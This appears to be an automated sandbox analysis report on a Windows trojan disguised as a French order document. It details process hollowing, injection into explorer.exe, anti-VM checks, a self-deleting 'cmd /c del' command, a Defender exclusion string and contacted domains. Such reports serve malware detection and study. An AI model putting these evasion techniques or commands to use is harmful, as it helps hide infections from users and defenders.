          Source: C:\Users\user\Desktop\document de commande.exeCode function: 0_2_06AF00400_2_06AF0040
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041D97A3_2_0041D97A
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041EC8A3_2_0041EC8A
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041DCAE3_2_0041DCAE
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00409E5B3_2_00409E5B
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00409E603_2_00409E60
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041E6903_2_0041E690
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00FC43513_2_00FC4351
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00FC66FF3_2_00FC66FF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7EC8A9_2_04D7EC8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D62D909_2_04D62D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7E6909_2_04D7E690
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D69E5B9_2_04D69E5B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D69E609_2_04D69E60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D62FB09_2_04D62FB0
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A360 NtCreateFile,3_2_0041A360
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A410 NtReadFile,3_2_0041A410
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A490 NtClose,3_2_0041A490
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,3_2_0041A540
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A35A NtCreateFile,3_2_0041A35A
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A40A NtReadFile,3_2_0041A40A
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A48A NtClose,3_2_0041A48A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A490 NtClose,9_2_04D7A490
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A410 NtReadFile,9_2_04D7A410
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A540 NtAllocateVirtualMemory,9_2_04D7A540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A360 NtCreateFile,9_2_04D7A360
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A48A NtClose,9_2_04D7A48A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A40A NtReadFile,9_2_04D7A40A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A35A NtCreateFile,9_2_04D7A35A
          Source: document de commande.exeBinary or memory string: OriginalFilename vs document de commande.exe
          Source: document de commande.exe, 00000000.00000002.686561299.0000000007340000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs document de commande.exe
Source: document de commande.exe, 00000003.00000002.753270968.0000000001B3F000.00000040.00000001.sdmp - Binary or memory string: OriginalFilenamentdll.dllj% vs document de commande.exe
Source: document de commande.exe, 00000003.00000002.753001435.0000000001A16000.00000040.00020000.sdmp - Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs document de commande.exe
Source: document de commande.exe - Binary or memory string: OriginalFilenameTimeZo.exe4 vs document de commande.exe
Source: document de commande.exe - Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: document de commande.exe - Virustotal: Detection: 31%
Source: document de commande.exe - Metadefender: Detection: 22%
Source: document de commande.exe - ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\document de commande.exe - Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown - Process created: C:\Users\user\Desktop\document de commande.exe 'C:\Users\user\Desktop\document de commande.exe'
Source: C:\Users\user\Desktop\document de commande.exe - Process created: C:\Users\user\Desktop\document de commande.exe C:\Users\user\Desktop\document de commande.exe
Source: C:\Windows\explorer.exe - Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe - Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\document de commande.exe'
Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\document de commande.exe - File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\document de commande.exe.log
Source: classification engine - Classification label: mal100.troj.evad.winEXE@7/1@3/1
Source: C:\Users\user\Desktop\document de commande.exe - Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe - Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_01
Source: C:\Windows\explorer.exe - File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\document de commande.exe - File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: document de commande.exe - Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: document de commande.exe - Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: chkdsk.pdbGCTL source: document de commande.exe, 00000003.00000002.752978247.0000000001A10000.00000040.00020000.sdmp
Source: Binary string: chkdsk.pdb source: document de commande.exe, 00000003.00000002.752978247.0000000001A10000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: document de commande.exe, 00000003.00000002.753021342.0000000001A20000.00000040.00000001.sdmp, chkdsk.exe, 00000009.00000002.932346690.00000000051DF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: document de commande.exe, 00000003.00000002.753021342.0000000001A20000.00000040.00000001.sdmp, chkdsk.exe, 00000009.00000002.932346690.00000000051DF000.00000040.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: document de commande.exe, WinMixer/frmMain.cs - .Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.document de commande.exe.220000.0.unpack, WinMixer/frmMain.cs - .Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.document de commande.exe.220000.0.unpack, WinMixer/frmMain.cs - .Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.document de commande.exe.fc0000.1.unpack, WinMixer/frmMain.cs - .Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.document de commande.exe.fc0000.0.unpack, WinMixer/frmMain.cs - .Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 0_2_002264B9 push es; ret 0_2_0022659A
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 0_2_06AF342D push dword ptr [edx+ebp*2-75h]; iretd 0_2_06AF3437
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_004168AF push A8DF1C14h; ret 3_2_004168B7
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_004171D2 push edi; iretd 3_2_004171E0
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_004079FD pushfd ; ret 3_2_00407A03
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_00417A5D push cs; ret 3_2_00417A5E
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_0041EA34 push 0F02B573h; ret 3_2_0041EA58
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_0041D56C push eax; ret 3_2_0041D572
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_0041D502 push eax; ret 3_2_0041D508
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_0041D50B push eax; ret 3_2_0041D572
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_0040961A push ecx; ret 3_2_0040961B
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_00405F1A pushad ; iretd 3_2_00405F1B
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_00FC6512 push es; ret 3_2_00FC659A
Source: C:\Windows\SysWOW64\chkdsk.exe - Code function: 9_2_04D7D4B5 push eax; ret 9_2_04D7D508
Source: C:\Windows\SysWOW64\chkdsk.exe - Code function: 9_2_04D7D56C push eax; ret 9_2_04D7D572
Source: C:\Windows\SysWOW64\chkdsk.exe - Code function: 9_2_04D7D502 push eax; ret 9_2_04D7D508
Source: C:\Windows\SysWOW64\chkdsk.exe - Code function: 9_2_04D7D50B push eax; ret 9_2_04D7D572
Source: C:\Windows\SysWOW64\chkdsk.exe - Code function: 9_2_04D6961A push ecx; ret 9_2_04D6961B
Source: C:\Windows\SysWOW64\chkdsk.exe - Code function: 9_2_04D65F1A pushad ; iretd 9_2_04D65F1B
Source: C:\Windows\SysWOW64\chkdsk.exe - Code function: 9_2_04D768AF push A8DF1C14h; ret 9_2_04D768B7
Source: C:\Windows\SysWOW64\chkdsk.exe - Code function: 9_2_04D771D2 push edi; iretd 9_2_04D771E0
Source: C:\Windows\SysWOW64\chkdsk.exe - Code function: 9_2_04D679FD pushfd ; ret 9_2_04D67A03
Source: C:\Windows\SysWOW64\chkdsk.exe - Code function: 9_2_04D77A5D push cs; ret 9_2_04D77A5E
Source: C:\Windows\SysWOW64\chkdsk.exe - Code function: 9_2_04D7EA34 push 0F02B573h; ret 9_2_04D7EA58
Source: initial sample - Static PE information: section name: .text entropy: 7.85154838784

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe - User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xED
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\chkdsk.exe - Process created: /c del 'C:\Users\user\Desktop\document de commande.exe'
Source: C:\Users\user\Desktop\document de commande.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\chkdsk.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe - Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match - File source: 0.2.document de commande.exe.25e46d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 0.2.document de commande.exe.2610300.2.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match - File source: Process Memory Space: document de commande.exe PID: 3116, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmp - Binary or memory string: SBIEDLL.DLL
Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmp - Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\document de commande.exe - RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\document de commande.exe - RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe - RDTSC instruction interceptor: First address: 0000000004D69904 second address: 0000000004D6990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe - RDTSC instruction interceptor: First address: 0000000004D69B7E second address: 0000000004D69B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\document de commande.exe TID: 6600 - Thread sleep time: -42551s >= -30000s
Source: C:\Users\user\Desktop\document de commande.exe TID: 4100 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6620 - Thread sleep time: -52000s >= -30000s
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 6000 - Thread sleep time: -36000s >= -30000s
Source: C:\Windows\explorer.exe - Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe - Last function: Thread delayed
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_00409AB0 rdtsc
Source: C:\Users\user\Desktop\document de commande.exe - Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\document de commande.exe - Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\document de commande.exe - Thread delayed: delay time: 42551
Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmp - Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmp - Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.711483629.000000000A60E000.00000004.00000001.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmp - Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.707678093.0000000006650000.00000004.00000001.sdmp - Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.730364449.000000000A716000.00000004.00000001.sdmp - Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000004.00000000.723247499.0000000004755000.00000004.00000001.sdmp - Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000000.730364449.000000000A716000.00000004.00000001.sdmp - Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000000.730460849.000000000A784000.00000004.00000001.sdmp - Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmp - Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\document de commande.exe - Process token adjusted: Debug
Source: C:\Windows\SysWOW64\chkdsk.exe - Process token adjusted: Debug
Source: C:\Users\user\Desktop\document de commande.exe - Process queried: DebugPort
Source: C:\Windows\SysWOW64\chkdsk.exe - Process queried: DebugPort
Source: C:\Users\user\Desktop\document de commande.exe - Code function: 3_2_0040ACF0 LdrLoadDll
Source: C:\Users\user\Desktop\document de commande.exe - Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe - Domain query: www.ecshopdemo.com
Source: C:\Windows\explorer.exe - Domain query: www.gaiaseyephotography.com
Source: C:\Windows\explorer.exe - Network Connect: 217.160.0.186 80
Source: C:\Windows\explorer.exe - Domain query: www.casaruralesgranada.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\document de commande.exe - Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: F0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\document de commande.exe - Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\document de commande.exe - Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Users\user\Desktop\document de commande.exe - Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe - Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\chkdsk.exe - Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\document de commande.exe - Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\document de commande.exe - Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\chkdsk.exe - Thread register set: target process: 3424
          Source: explorer.exe, 00000004.00000000.721172067.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.721558730.0000000001080000.00000002.00020000.sdmp, chkdsk.exe, 00000009.00000002.933070838.0000000006110000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.687772546.0000000005E50000.00000004.00000001.sdmp, chkdsk.exe, 00000009.00000002.933070838.0000000006110000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.721558730.0000000001080000.00000002.00020000.sdmp, chkdsk.exe, 00000009.00000002.933070838.0000000006110000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.721558730.0000000001080000.00000002.00020000.sdmp, chkdsk.exe, 00000009.00000002.933070838.0000000006110000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.730364449.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Users\user\Desktop\document de commande.exe VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
